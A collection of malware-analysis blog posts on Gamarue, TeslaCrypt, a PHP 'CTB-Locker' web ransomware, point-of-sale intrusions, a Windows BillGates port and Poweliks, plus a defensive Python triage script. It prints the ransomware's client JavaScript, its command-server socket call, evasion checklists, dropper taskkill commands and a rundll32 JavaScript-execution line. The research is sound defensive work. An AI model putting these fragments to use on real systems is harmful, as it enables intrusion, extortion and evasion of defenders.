9d41dc182dee0690e5c5f08f9276548a85f4b986478fd30ec4208d95d54cffeb  .KzmJO5vHRQ
b30dfa13f8dc7162f3edb43dff8507f82c01bd5bd6e5a1ae2e3b2e55dd6b10c0  .LqZzmAJcjo
f7bc5d56312ae6205b21aa4c72708383716907754b037013f47bc88203fbb450  .Oer60jCsoB
9909910d6e008e15c98d26e214f619a7a82787137158784998d99b5c03cbe8f2  .OiZhEG9cEu
2549560970bb8ebca0136f7d6c8111196295d083c6fd6101a7f9178089502cc0  .q7hsioOPWv
fe2c837d1662ca47ebd86c0cf0a3a382ee589bce6b77dabae30801d71a7d280f  .rG47yPBz5p
67a3b5d1fb946daccd7f3562e35b90537f9032184a0605cc9b8613c91a4ea1be  .RnKtruJM9f
22a578f2d30f316d441b73efbeaa0b53641686d2fa75ad44d4d3992da9ceaf5f  .SzIYofKRTz
0723de24bc86eedde149c53e0f93a18596bed424e823f1b46c2f97e358931b83  .YPuels1RDm
6b46b6eff4be06d47284492fed7f71c53103bfaa610952151bddebb8046a34f1  .yYRSdRs6kH
9bd1d3a567e2036f8e57745dd81333911b06a34f4ed6d7d68daa674aac0d7b96  .Zw64nQ52IX


Gamarue loves malicious JavaScript too

A deep look inside a recent campaign

In the malware ecosystem, some old malware families manage to adapt their propagation methods and keep infecting many users. Gamarue (aka Andromeda) is one of them. This post explains how a new Gamarue campaign spreads through malicious JavaScript attached to spam emails.
Early in April, I was pinged on Twitter about a spam campaign in progress:
Yet another malware dropped via emails and malicious JavaScript. The binary dropped is:
The attack vector is an email carrying a zip archive. The archive contains a JavaScript file that downloads and executes a payload hosted on the Internet: this payload is good old Gamarue.

Gamarue / Andromeda

Gamarue (or Andromeda) is a well-known modular malware. Basically, Gamarue is a dropper that installs different modules. Since it is easy to develop a new module, crooks love Gamarue.
Don't worry, this article is not yet another Gamarue analysis; plenty of great write-ups are already available.
I am not a big expert on Gamarue, so I had some difficulty identifying the version of the malware. For those who can help, the C&C requests look like:
This template doesn’t match the usual version (
Here are some of the features of the packer found in this version of Gamarue.

AV detection

The packer tries to detect whether an anti-virus is installed on the victim's computer. To do so, it calls ZwQuerySystemInformation with the SystemProcessInformation class (0x5) to retrieve the process list and checks for the presence of one of the following processes:

  • dwservice.exe (DrWeb)
  • defenderdaemon.exe (Shadow Defender)
  • spiderui.exe (DrWeb)
  • spidernt.exe (DrWeb)


VM detection

The Gamarue packer tries to find out whether it is running in a virtual environment by checking (as for the AV detection) whether some processes are running:

  • vmacthlp.exe (VMWare)
  • vboxservice.exe (Virtual Box)
  • vboxtray.exe (Virtual Box)

It also attempts to load some DLLs to detect whether it is running in a virtualized environment:

  • VBoxHook.dll (Virtual Box)
  • VBoxMRXNP.dll (Virtual Box)

And finally, it checks if the VMWare tools directory exists:

  • C:\program files\VMware\VMware Tools



To complicate dynamic analysis, the packer also looks for some analysis tool processes:
– taskmgr.exe (the built-in Windows task manager)
– procmon.exe (Process Monitor)
It also enumerates all window titles, looking for the strings:
– HTTP Analyzer
– Sysinternals
– capturing from Wireshark
– TCPViewClass TCPView
– task manager

After the unpacking process, Gamarue launches C:\windows\system32\lsass.exe (either with CreateProcess or WMI) and injects a rogue DLL inside the process.
This DLL is used to communicate with the C&C and drops three modules:

  • Pony, a well-known stealer. This module steals sensitive data like FTP credentials, bitcoin wallet, browser credentials…
  • Hioles, a malware that acts as a proxy on the victim’s computer in order to steal webmail information (Hotmail credentials, for example).
  • A mail spammer.

To better understand this campaign, we need to gather some information around this sample. To do that, let’s take a look inside the C&C server to find something useful.

Data exploration

I tried to grab useful data by “guessing” paths on the C&C web server found inside the original binary: looking for subdirectories that are reachable and, with luck, a directory with the “directory listing” option enabled. After some guessing I was able to identify some interesting content inside the C&C web server:

Stolen Data


In two different directories, I found a lot of text files containing stolen data. The data relate to email accounts and look like data exfiltrated by Hioles.

Pony panel

As seen in the original sample, a Pony module is used. I found the module’s control panel in a subdirectory of the web server.
You can find a lot of information on the Internet about pony
As we can see here, the attacker is running a malware campaign to collect stolen credentials.

ProxyCB Control panel

In another directory of the web server, I found a PCB control panel. PCB is used to manage a botnet of proxies. You can find more information at
Some screenshots inside the control panel:



JavaScript obfuscation script

In the root directory of the C&C, I found a PHP page that displays obfuscated JavaScript in a text area:
This page probably serves a ‘debugging’ purpose: a different script is generated each time the web page is refreshed.
Since this JavaScript is the same as the malicious attachment originally received by email, it must be related to the obfuscation of the JavaScript payload; we are on the right track…

The spam kit source code

Finally, I found a browsable directory that contains everything needed to understand how this Gamarue campaign works.
The archives 1/5.rar and nnn.rar contain a huge database of email addresses to spam.
Sendmail.rar is the source code of the spamming kit.
The other text (.txt extension) files are part of the spamming kit.
Let’s analyze the spamming kit inside sendmail.rar.
Let’s have a look at the binaries:

  • KWK.exe

It is software used to generate keywords. We can imagine that these keywords are used to craft random emails for the spamming campaign.

  • VPSProxy.exe

VPSProxy is software created to manage a list of proxies. These proxies are infected websites (CMS). The attackers upload a malicious PHP script to the compromised CMS servers and use them as proxies. It is really useful to stay hidden when you are a crook :).
The PHP source code of the script uploaded to the compromised hosts can be found at:
In the archive sendmail.rar, VPSProxy is configured with a list of 179 compromised hosts.
I was not able to find a binary in charge of sending spam like the one in the TeslaCrypt case ( It seems that this spamming process is different.
I looked inside the other files of sendmail.rar and found the source code of the spamming kit, from JavaScript obfuscation to mail sender.
For those who are interested, I put the readme on pastebin (
The whole kit works around the file send.php.
First, the script checks whether the « jscode » option is enabled. If so, it loads another script: jscode.php.
Jscode.php is the script in charge of the JavaScript obfuscation.
It takes the clean JavaScript code as input. In this case, it is a JavaScript script that downloads 3 binaries, copies them to the %TEMP% directory and executes them, a classic pattern in recent months. The JavaScript is obfuscated through random string generation.
After obfuscation, let’s go back to send.php. The script crafts random emails based on information found in the txt files (sender email, subject, message, etc.).
For example:

  • The email template:


  • The subject template:


  • A list of fake names:


  • A list of fake source email addresses:

To send spam, the script does not use compromised SMTP servers as TeslaCrypt does ( This time, the script uses a list of compromised websites to which an attacker has uploaded a malicious PHP script. The kit contains a list of 14179 compromised hosts (the huge majority are WordPress websites).
The malicious script used to send mail (via the PHP mail() function) is available at :
Finally, online, this spamming kit looks like:
In sendmail.rar we can also find a standalone PHP script, update.php, used to automatically deploy the spamming kit.
We now have all the information needed to follow this campaign closely with free tools like (looking for recently submitted ‘ .zip’ files):


Yet another malware campaign with malicious JavaScript and compromised CMS.
Abandoned WordPress sites are a real security problem. Administrators leave old WordPress sites online for several years. Given the number of vulnerabilities in WordPress plugins, it becomes very easy to build a list of several thousand compromised WordPress sites. Old WordPress sites were involved in every recent malware campaign (Locky, Dridex, TeslaCrypt and now Gamarue…).
I’m really fed up with this situation but there is no real solution.
As a reminder, to protect the endpoint, you can change the default program associated with ‘.js’ files from wscript.exe to notepad.exe. This prevents the script from being executed by mistake when a user opens it.
Some points in conclusion:

  • JavaScript file is NEVER (NE-VER) USED as a format for an invoice (NEVER, REALLY!)!
  • If you are a website administrator, DO NOT LEAVE OLD WORDPRESS SITES ON THE INTERNET.
  • And, if you are a crook, allowing directory listing on your web server is really a good idea for investigation.

I would like to thank @F_kZ_ @dvk01uk @JAMESWT_MHT @Techhelplistcom @MalwareTechBlog @malwrhunterteam and @malwaremustdie for their help during this investigation.

Let’s ride with TeslaCrypt

As you can see, we have been working on ransomware over the past few days. This time, we are talking about TeslaCrypt.
TeslaCrypt is a ransomware spread by e-mails or exploit kits. It encrypts your files and asks you to pay in order to retrieve the decryption key. The current version is 3.0. Many analyses are already available on the Internet.
In this article we are focusing on two aspects of TeslaCrypt:
– The attack vector
– The web callback

Attack Vector – Bombila

Early in February 2016, Xylitol added an unknown panel on cybercrime-tracker.
After some research, we have found a binary file hosted on the server at the following address: hxxp://
This binary file is a bot that sends spam. It uses a list of compromised SMTP servers contained in the file hxxp://
This file (781 MB) contains around 4000 compromised SMTP accounts (Orange, SFR, Telefonica, Yahoo, Gmail, etc.).
After that, the binary file retrieves a list of e-mails from hxxp://*****.txt.
Directory listing was enabled on this directory, so we could find 139 text files containing 792 256 e-mails.
The spam bot also retrieves some texts for crafted e-mails via several files in hXXp:// For example, some fake names: and random text like:
Finally, the bot retrieves malicious attachments from the directory hXXp://*****.zip. 200 zip files are waiting in this directory.
These zip files contain malicious JavaScript droppers, each one dropping the TeslaCrypt ransomware.
Everyone has seen this type of attachment for the last few months in their mailbox.
Here is an example of these malicious droppers:
This JS drops the malicious (TeslaCrypt) binary file from:
These servers are known for spreading the TeslaCrypt ransomware:
When spamming, the binary file writes a lot of logs on the infected machine, such as:
And now let’s get to the fun part. After some guessing, we found an archive at hxxp:// This zip file (size: 468 MB compressed, 2 GB decompressed) is a full backup of the server. It contains all the files of this spamming server: source code, logs, payloads, etc.
For example, the source code of the spammer bot callback: or index.php:
This archive also contains 45 million e-mails in different text files.
This overview gives us a better understanding of how the TeslaCrypt ransomware is spread. We can suppose that the crooks running the spam campaigns are different from the ones who manage the ransomware.
I would like to thank the CERT Orange for their work and MalwareMustDie for their support.

TeslaCrypt – Web callback

Now, let’s talk about a poorly documented part of the ransomware: the web callback.
When a machine is infected by TeslaCrypt, the malware sends some data to a web callback on a compromised server. For example:
(thanks to @techhelplist )
This callback is just a gateway to the real C&C hosted in TOR.
The source code of such a callback is available at:
First, the page rejects IP addresses belonging to Microsoft:
After that, the callback creates a file most.txt and logs all data received from infected machines in this file.
This file looks like:
These data are also sent to three TOR callbacks:

In the TeslaCrypt web kit, we can see another file named « cron.php » (source code available at: )
The code compares three variables, $_REQUEST['password'], $_REQUEST['re_password'] and $_REQUEST['login']. The aim of this code is still unclear.
This information is perfect for following the infection rate of TeslaCrypt. After grabbing the most.txt file from different callbacks, we were able to compute some statistics on a small part of this campaign:
– We retrieved 30 210 raw data rows:
– 15 290 unique IP addresses (due to NAT, one IP address can correspond to several infected machines)
– 40 TOR exit nodes :)
We can see that the most affected countries are Republic of Korea and Turkey. The whole statistics are available at


We looked at another face of the TeslaCrypt infection: the attack vector and the web part. Both were interesting to analyse.
This data is always interesting for estimating the infection rate of a campaign. The logged files show that the infection rate is quite high; ransomware is definitely a lucrative business.
The web part of ransomware is often forgotten; with different articles we will try to better understand the whole picture.


A lockpicking exercise

A malware calling itself « CTB-locker » has been spreading over some websites since the 12th of February 2016. This campaign differs from classical ransomware attacks, which focus only on workstations: at first sight, CTB-locker also targets websites in order to encrypt all the files located on the server.
I found this campaign by accident. During an investigation, I retrieved a malicious binary file from hXXp:// In order to understand the context, I visited the homepage of this server and landed on this rather scary page:
The ‘Decrypt’ button leads to a page offering to decrypt two of the lost files for free:
If the website administrator is worried, a chat with the crooks is even possible!
I was not aware that CTB-Locker was also attacking websites?! It was time for further investigation.
With the help of some search engines, I was able to find a lot of websites with the same homepage:
It seems that an attack was ongoing. To help, you can find a list of these websites on Pastebin:
I was quickly able to find 102 websites infected by this « CTB-Locker ».
The JavaScript in their homepage (index.php) reveals something interesting:

admins = ["", "", ""];   // gate server URLs (redacted in this post)
iadmin = 0;
// victim identifier: the page's own hostname, stripped of scheme and path
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
    $.post(admins[iadmin], postdata+"domain="+domain, function (data) {
        // handler body truncated in the original listing (presumably calls onsuccess(data))
    });
}

$('#decrypt').click(function() {
    post_admin("decrypt=", function(data) {
        // truncated in the original listing
    });
});

$('#dectest').click(function() {
    post_admin("dectest=secret="+($("#secret").val()), function(data) {
        // truncated in the original listing
    });
});

$('#sendmsg').click(function() {
    msg = "msg=" + encodeURIComponent($("#chatmsg").val());
    post_admin("sendmsg=secret="+$("#secret").val()+msg, function(data) {
        // truncated in the original listing
    });
});

$('#recvmsg').click(function() {
    post_admin("recvmsg=secret="+$("#secret").val(), function(data) {
        // truncated in the original listing
    });
});

As we can see, POST requests are sent to other second-level servers, which we will call “gates”, in order to decrypt the files:
admins = ["", "", ""];

I compiled a list of gate servers from the infected websites on Pastebin as well:
Even if it is not confirmed, we can suppose that this ransomware works in this way:
So, it’s time for my favorite game: finding a sample.
The original victim server,, seems to be a good starting point: this server should be full of vulnerabilities, since it hosts malware like the CTB-Locker ransomware.
After some research, I found an unprotected webshell already running on the server:
Thanks to this webshell, it is really easy to grab the files related to CTB-Locker. And now I’m sure: this ransomware uses only PHP scripts.
First, let’s have a look at the root index.php file (available at ).
This ransomware is composed of several files:
A directory named « Crypt » containing a bunch of self-explanatory PHP scripts:
– AES.php
– Base.php
– BigInteger.php
– Hash.php
– Random.php
– Rijndael.php
Along with the index.php main page, other files are relevant to this ransomware: allenc.txt, test.txt, victims.txt, extensions.txt, temp, robots.txt and secret_XXXXX.txt.

The encryption process starts when a malicious user generates a specially-crafted POST request to the index.php page:
encrypt_files($victims, $_POST['submit'], $_POST['submit2']);
The function enc_excluded in index.php is used to exclude the core ransomware files listed above (just to be sure the malware will not encrypt itself!).
The list of files to encrypt is computed in the function get_files. Directories are recursively crawled and the list of files to encrypt (in AES-256) is written to the file victims.txt.
The files are chosen based on their extension. The list of extensions to keep is contained in the file extensions.txt:
This list of files is then passed to the function encrypt_files. This function selects two files from the list and writes them to test.txt.
These two files are encrypted with a first key (the “submit” variable in the POST request) and can be decrypted for free using the feature “We give you the opportunity to decipher 2 files free!”.
The other files are encrypted with another key (the “submit2” variable in the POST request) and this list is written to the file allenc.txt.
To uniquely identify the infected server, the ransomware uses a secret computed as characters 2 to 10 of the MD5 hash of the string “djf33” + the hostname (ex: md5(djf33www.

$secret = substr(md5("djf33".cur_domain), 2, 10);

When the user clicks the « Decrypt » button, a request is sent to the gate servers:

admins = ["", "", ""]; via the variable decrypt=

If the user has paid correctly, a popup appears with the contents
« Your decryption key is XXXXXX » and index.php is reloaded with the correct POST parameters:

window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];

Loading this page with these parameters decrypts the files.
Servers hosting the access.php page are in fact compromised servers. So, to reach the C&C server, I need to have a look at the code of access.php.
I managed to get hold of an access.php file, whose content is available at
The C&C address is hard-coded in this page:
$result = socket_connect($sock, "", 9338);
A socket is opened and waits for commands such as:
– “Vic” for decrypting
– “Snd” / “Rcv” for chat feature

I don’t have the code behind the socket on yet, but even if I found it, I would not release it on the Internet :).
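As an added defender-side example (not code from the original post or from the kit), here is a Python triage script that checks a web document root for the artifacts listed above (the Crypt/ scripts, allenc.txt, test.txt, victims.txt, extensions.txt and the secret_XXXXX.txt marker) and derives the expected secret file name from the hostname the same way the kit does. It assumes that cur_domain is the site’s bare hostname and that the .txt list files hold one path per line; the sample document root it builds is constructed data.

```python
"""Triage helper for the CTB-Locker web variant described above.

Added example, not part of the original post or of the ransomware kit.
"""
import hashlib
import os
import tempfile

# File names the post lists as belonging to the kit.
CRYPT_FILES = ("AES.php", "Base.php", "BigInteger.php", "Hash.php",
               "Random.php", "Rijndael.php")
STATE_FILES = ("allenc.txt", "test.txt", "victims.txt", "extensions.txt")


def ctb_secret(domain):
    """Mirror the kit's victim identifier: substr(md5("djf33" . domain), 2, 10).

    Assumption: cur_domain is the bare hostname of the infected site
    (the post shows md5(djf33www....)), e.g. "www.example.com".
    PHP substr(x, 2, 10) returns 10 characters starting at offset 2.
    """
    digest = hashlib.md5(("djf33" + domain).encode("utf-8")).hexdigest()
    return digest[2:12]


def _count_lines(path):
    """Number of non-empty lines; assumption: one file path per line."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return sum(1 for line in fh if line.strip())


def scan_docroot(root, domain):
    """Look for the kit's artifacts under a web document root.

    Returns the artifacts found, the line counts of the list files
    (victims.txt / test.txt / allenc.txt) and a verdict.
    """
    crypt_dir = os.path.join(root, "Crypt")
    report = {
        "crypt_php": [f for f in CRYPT_FILES
                      if os.path.isfile(os.path.join(crypt_dir, f))],
        "state_files": [f for f in STATE_FILES
                        if os.path.isfile(os.path.join(root, f))],
        "secret_file": None,
        "counts": {},
    }
    # The kit names its marker file after the per-victim secret, so the
    # expected name can be predicted from the hostname alone.
    expected = "secret_%s.txt" % ctb_secret(domain)
    if os.path.isfile(os.path.join(root, expected)):
        report["secret_file"] = expected
    for name in ("victims.txt", "test.txt", "allenc.txt"):
        path = os.path.join(root, name)
        if os.path.isfile(path):
            report["counts"][name] = _count_lines(path)
    # A Crypt/ directory of crypto classes alone could be a legitimate
    # library; require the kit's state files or the secret marker too.
    hits = len(report["state_files"]) + (1 if report["secret_file"] else 0)
    report["verdict"] = ("ctb-locker-web artifacts present"
                         if report["crypt_php"] and hits >= 2
                         else "no conclusive artifacts")
    return report


def build_sample_docroot(domain="www.example.com"):
    """Constructed sample document root mimicking an infected server."""
    root = tempfile.mkdtemp(prefix="ctb_sample_")
    os.mkdir(os.path.join(root, "Crypt"))
    for name in CRYPT_FILES:
        with open(os.path.join(root, "Crypt", name), "w") as fh:
            fh.write("<?php // placeholder\n")
    samples = {  # constructed contents, one path per line (assumption)
        "victims.txt": "/var/www/img/a.jpg\n/var/www/doc/b.doc\n/var/www/doc/c.pdf\n",
        "test.txt": "/var/www/img/a.jpg\n/var/www/doc/b.doc\n",
        "allenc.txt": "/var/www/doc/c.pdf\n",
        "extensions.txt": "jpg\ndoc\npdf\n",
        "secret_%s.txt" % ctb_secret(domain): "\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return root, domain


if __name__ == "__main__":
    sample_root, sample_domain = build_sample_docroot()
    print(scan_docroot(sample_root, sample_domain))
```

Point scan_docroot at a real document root and hostname to get the same report for a suspect server.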

The last question to answer is how the victim websites were infected. I don’t have a clear answer to this question; here are just some elements describing these servers.
Given that a lot of victims do not run a dynamic website or a CMS, it is difficult to say whether the malware uses a well-known vulnerability.
The infected hosts run both Linux and Windows and the majority of them (73%) host an Exim service (SMTP server).
Most of them run a password-protected webshell reachable through the “logout.php” dynamic page.
Some of them are vulnerable to Shellshock, but without deep access to the victims’ servers, it is difficult to understand how this ransomware infected the hosts.

Like every week for the last six months, a new ransomware family has popped up. This time, servers are targeted, using simple PHP scripts to perform the malicious activities.

I would like to thank nl3dee, who helped me retrieve the source code of access.php.
All the source code is available at

Low-cost point of sales (PoS) hacking

Hacking point-of-sale (PoS) systems is a very trendy topic. A lot of PoS malware can be found in the wild (jackPOS, gamaPOS, Backoff, FighterPOS…). With every big breach of PoS systems, the media talk about sophisticated attacks involving high skills and great tools. But sometimes compromising a PoS can be very easy, and no particular skills are required to steal sensitive information such as credit card numbers.
During our investigation, we came across a very interesting case of “low-cost” PoS hacking. This article tries to unveil the inner workings of the infection.

Everything started with a Win32.Ardamax sample found in the wild. Ardamax is a commercial keylogger available on the Internet.
After reversing this sample, it appears that the malware uploads data to an FTP server hosted in Germany, at server4you. This FTP server can easily be accessed (the login and password are embedded in the sample) and contains the victims’ uploaded data.
This FTP server seems to have been in use since the 9th of October 2014. It is full of samples, tools and exfiltrated data.
We cannot publish the original sample, because Server4you has not shut down the server yet.
Exfiltration server
This repository contains the original Win32.Ardamax sample, other malware (DarkComet, Andromeda, Gorynych…), some memory scrapers used to retrieve credit card numbers, and website crawler scan results.
On the same repository, we can find screenshots, microphone recordings, webcam pictures as well as keystroke recordings for each single infected computer.
Keylog result
The crooks have access to about fifteen point-of-sale computers as well as to some SCADA systems.

Belgium SCADA
Cinema PoS
Brazilian gas pump

We spent a lot of time contacting CERTs and companies to get computers cleaned, but day after day new infected point-of-sale data were uploaded to the FTP repository.
How were the crooks able to continuously find new targets to infect?
Among the uploaded data, some screenshots caught our attention: somebody was using a VNC brute-force tool against a large range of IP addresses.

The tool used by crooks can be retrieved from an archive uploaded to the VirusTotal website:
It seems they are using infected computers to brute-force VNC servers with weak passwords. When a new VNC connection is established, a new payload is downloaded through a regular browser and installed on the newly infected machine. No exploit or sophisticated technique is employed.

Gorynych installation

Once the payload is downloaded, any installed antivirus is configured to ignore it or is even completely uninstalled. This requires administrator rights on the computer, but obviously this is quite a common situation on point-of-sale systems.

That day, Gorynych was the payload being spread:
Last but not least, the crooks used compromised computers to administer the Gorynych panel:

Over several days we followed the whole stealing process. The crooks infected point-of-sale systems and used mainstream memory scrapers like SearchforCC to exfiltrate credit card numbers.
As we can see, there is no need for sophisticated attacks or processes to infect systems. With a little more time, the crooks would be able to infect a much larger range of systems. With a short list of 152 weak passwords, an attacker is able to control a lot of point-of-sale systems. In this case, the crooks gained access to everything from small and medium-sized enterprises to companies with 500 million dollars in annual sales.
This kind of campaign would not be so easy to carry out if:
• Point of sales computers were not directly connected to the Internet;
• Strong VNC passwords were used;
• Administrator accounts were not used to connect to sensitive systems.
This kind of negligence can result in a huge waste of money and a very bad image for the compromised company.


Payload found on the FTP site


Related servers

When ELF.BillGates met Windows

If you are used to playing with honeypots, you have inevitably met the ELF.BillGates malware. It is a known[1] botnet that has been spreading over the Internet for 4 years.

In a nutshell, ELF.BillGates is a (Chinese) DDOS botnet with backdooring features. It is a binary file whose behavior depends on the installation path[2]:

  • Gate 0: Infection Monitor (dropper + persistence)
  • Gate 1: Host (Contact C&C + DDOS features)
  • Gate 2: Backdooring
  • Gate 3: Utility spoofing

The “Elf.BillGates” version targets the Linux operating system. We have followed the activities of this botnet for several months, and during our investigations we found some versions of a Windows fork of the malware. This article attempts to detail this variant.

The primary infection vector is the exploit of the vulnerability CVE-2014-6332[3], which drops the binary file hosted on an HTTPd File Server (HFS)[4]. This vulnerability allows an attacker to escape the Internet Explorer sandbox with a VBScript script and execute an arbitrary binary file downloaded from the Internet.



Figure 1 – Example of compromised HFS server

First and foremost, we noticed that this malware seems to be under active development. The author seems to be testing in the wild, and several samples are unstable.

In a few weeks, we collected about thirty samples and identified 2 different versions of the malware:

    • A version that almost works on Windows XP but is unstable on more recent operating systems.
    • A very unstable version based on the Safeengine protector (a packer against reverse engineering)[5].

Both versions reference the same symbol path:

重构 can be translated as builder.

This article analyzes a sample of the first family, named 36000.exe (sha1: 4b14d7aca890642c3e269b75953e65cb).

GatesInstall – Gate 0 – Infection monitor

PDB: F:\\Updates\\重构\\GatesInstall\\Release\\GatesInstall.pdb

This is the installation part of the malware, which drops the different files on the system and creates persistence.

This sample is not obfuscated, but we have met some UPX-packed samples.

This binary file embeds seven executable resources.


Figure 2 – PEStudio view of the binary


As we can infer from the PDB path, this binary file is the installer of Win32.BillGates malware.

On its first execution, it checks whether the system is already infected by trying to kill BillGates instances with the system tool taskkill.exe:
Taskkill /F /IM DbSecuritySpt.exe
Taskkill /F /IM Bil.exe
Taskkill /F /IM svch0st.exe
Taskkill /F /IM DNSClient.exe
Taskkill /F /IM DNSProtection.exe

/F forces the process to terminate, /IM selects it by image name.

After this check, the malware determines the OS version with GetVersionExA and fills a global variable with one of the following values. It is supposed to support all versions of Windows:

Windows Server 2008 R2
Windows Server 2008
Windows 7
Windows Vista
Windows Server 2003
Windows XP
Windows 2000
Windows NT
Windows 32s
Windows Unknown

After that, it checks whether it runs on a 32- or 64-bit OS with the help of the GetSystemWow64DirectoryA API.

Happy to play with an old Windows installation, I tried to launch the installer on Windows 2000 but I was disappointed: GetSystemWow64DirectoryA is only available starting from Windows XP, so the process does not start, due to this unresolved import:


Figure 3 – Error: Unable to find entry point of GetSystemWow64DirectoryA Proc on kernel32.dll

Detecting OS versions older than Windows XP is therefore pointless.

After that check, the malware installation depends on the OS version.

On Windows 2003 / XP, the following files are created:

C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe (resource 107 or 108)
C:\Program Files\DbSecuritySpt\svch0st.exe (resource 104)
C:\Program Files\Windows Media Player\agony.exe (resource 103)
C:\Program Files\Windows Media Player\agony.sys (resource 102)
C:\Program Files\Windows Media Player\DNSProtection.exe (resource 107 or 108)
C:\Program Files\Windows Media Player\DNSSupport.exe (resource 107 or 108)

On Windows 2008 Server, two additional files are created:

C:\Program Files\DbSecuritySpt\NPF.sys (resource 105)
C:\Program Files\DbSecuritySpt\packet.dll (resource 106)

DbSecuritySpt.exe, DNSSupport.exe and DNSProtection.exe have the same contents. On the 32-bit edition of the OS, resource 107 is used whereas resource 108 is used on the 64-bit variant of the OS.

After several tests, Win32.BillGates is only able to start on Windows XP. On newer versions of Windows, the installer simply crashes. This crash seems to be related to ASLR: when the code attempts to retrieve the security cookie in functions handling buffers, it references a hard-coded address as if the binary had been loaded at a fixed address, which generates an access violation.


The rest of this article details the analysis of the malware on Windows XP.

Once the binary files are written to disk, GateInstall launches DbSecuritySpt.exe and DNSSupport.exe as services. Creating services requires administrator privileges. In most cases, the attackers gain administrator privileges by brute-forcing the administrator RDP account on Windows Server 2003 computers.

That’s all for the installer.


GateInstall writes the same binary file to 3 locations:

C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe (resources 107 or 108)
C:\Program Files\Windows Media Player\DNSProtection.exe (resources 107 or 108)
C:\Program Files\Windows Media Player\DNSSupport.exe (resources 107 or 108)

PDB: F:\\Updates\\重构\\GatesInstall\\Release\\Gates.pdb

Gates starts with an identification routine:

      • Decryption of its configuration
      • Check of the file path and whether it is launched as a service.

The configuration is encrypted with a hard-coded RSA 1024 key:


Once decrypted, the configuration data is organized in the same way as the ELF version[6]:


In the Windows version, the offsets of prime C, D and modulus N are hard-coded, meaningless and not used.

In this sample we noticed an empty campaign name, but other analyzed samples were linked to a named campaign:

The Windows binary also contains some cleartext strings that allow us to say it is a variant of the ELF version:


DbSecuritySpt – Gate 1 – Host

Launched as a service, DbSecuritySpt is the main persistent binary. To trigger the DbSecuritySpt behavior, the binary must be launched as a service from C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe.

DbSecuritySpt launches several threads in charge of fingerprinting the computer, communicating with the C&C infrastructure and performing DDoS actions.

The following data is sent to the C&C:



This service is also in charge of taking part in DDoS campaigns.

DbSecuritySpt is supposed to support several DDoS types: ICMP, SYN, UDP and DNS amplification.

The binary file contains a list of 230 hardcoded IP addresses that correspond to DNS servers used for DNS amplification attacks[7].


We tested these DNS servers. Only 58 IP addresses still seem to be vulnerable. The other servers were either patched or unreachable.

svch0st – Gate 2 – Backdoor

PDB: E:\SVN\trunk\2014\小陈\重构\IECtrl\Release\IECtrl.pdb

小陈 can be translated as Chen and 重构 as builder.

At last, GateInstall drops the binary file C:\Program Files\DbSecuritySpt\svch0st.exe.

The original name of this file is IECtrl.exe. IECtrl is an independent tool also used by other malware (such as Win32:Wapomi-B).

It implements the backdoor functionalities of Win32.BillGates. This tool is identified by Microsoft as « Trojan:Win32/WebToos.B ».

DbSecuritySpt.exe passes a list of C&C server URLs as a parameter to IECtrl. IECtrl contains the logic to download, extract and execute payloads from these URLs.

DNSSupport – Gate 3 – Spoofing utility

DNSSupport must be run as a service from the location C:\Program Files\Windows Media Player\DNSSupport.exe. Its behavior is simple: it launches DNSProtection.exe and then loops forever, which prevents the service from being stopped.

Spoofing utility


DNSProtection is the “spoofing utility” Gate. It is not functional in the analyzed sample. However, static analysis of the binary allows drawing some conclusions about its internal behavior.

DNSProtection is used to hide infection traces. It uses the Agony rootkit. Agony is composed of an executable (agony.exe) that loads and runs a driver (agony.sys). This rootkit was released in the wild some years ago. It is used for hiding files, services and network connections. This malware uses DNSProtection to hide all dropped files (DNSSupport.exe, DNSProtection.exe, DbSecuritySpt.exe, agony.sys, agony.exe and svch0st.exe) and the connections to the C&C servers.


Agony.sys cannot be loaded on a 64-bit version of the operating system because it is not signed.


The Win32.BillGates developers do not seem to be used to developing malware for the Windows operating system. They use poor techniques that are easily detected by anti-virus software, and the operating system compatibility limitations could easily have been avoided. This Windows port is not as big a threat as the ELF version.

ELF structure compared with Windows version:

      • GateInstall : Gate 0
      • DbSecuritySpt : Gate 1
      • Svch0st : Gate 2
      • DNSSupport / DNSProtection : Gate 3


During our analysis, we noticed some samples with strange behaviors (hooking, binary file infection, IRC connections …). After further analysis it appears that some samples were infected by the Win32.Virut and Win32.Parite viruses. Virut and Parite are viruses that infect ‘.exe’ and ‘.scr’ Windows binary files on disk. It is possible that the crooks using the BillGates malware are working on infected systems.

This may also explain why a lot of Win32.Parite cleaning tools were found on several active BillGates C&C servers we visited.

Here is a screenshot of such a tool:


About 30% of analyzed samples were infected by Win32.Parite and 20% by win32.Virut.



Some Win32.BillGates hashes:


Win32.BillGates infected by Win32.Virut:


Win32.BillGates infected by Win32.Parite:



      • Created files :
        • C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe
        • C:\Program Files\DbSecuritySpt\svch0st.exe
        • C:\Program Files\Windows Media Player\agony.exe
        • C:\Program Files\Windows Media Player\agony.sys
        • C:\Program Files\Windows Media Player\DNSProtection.exe
        • C:\Program Files\Windows Media Player\DNSSupport.exe
        • C:\Program Files\DbSecuritySpt\NPF.sys
        • C:\Program Files\DbSecuritySpt\packet.dll
      • Created services:
        • DbSecuritySpt
        • DNSSupport
      • Running processes:
        • DbSecuritySpt
        • DNSSupport
        • DNSProtection
        • exe








Related works:

MalwareMustDie :



Poweliks – Command Line Confusion

Recently, hFireF0X provided a detailed walkthrough on the reverse engineering forum about Win32/Poweliks malware. The particularity of this malware is that it resides in the Windows registry and uses rundll32.exe to execute JavaScript code.

I found it funny that we can execute some JavaScript through Rundll32 and obviously I was not the only one.


When we first saw the command line executing JavaScript, we were wondering how it worked.

In this blog post, we analyze how and why JavaScript is executed when calling this simple command line:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');

Reminder about Rundll32

Rundll32 usage is documented on MSDN; it is used to call an exported function of a DLL file which can be achieved with the following command line:

RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

entrypoint is the exported function; its prototype must be:

void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow);

The lpszCmdLine parameter is given the <optional arguments> value specified on the rundll32 command line.

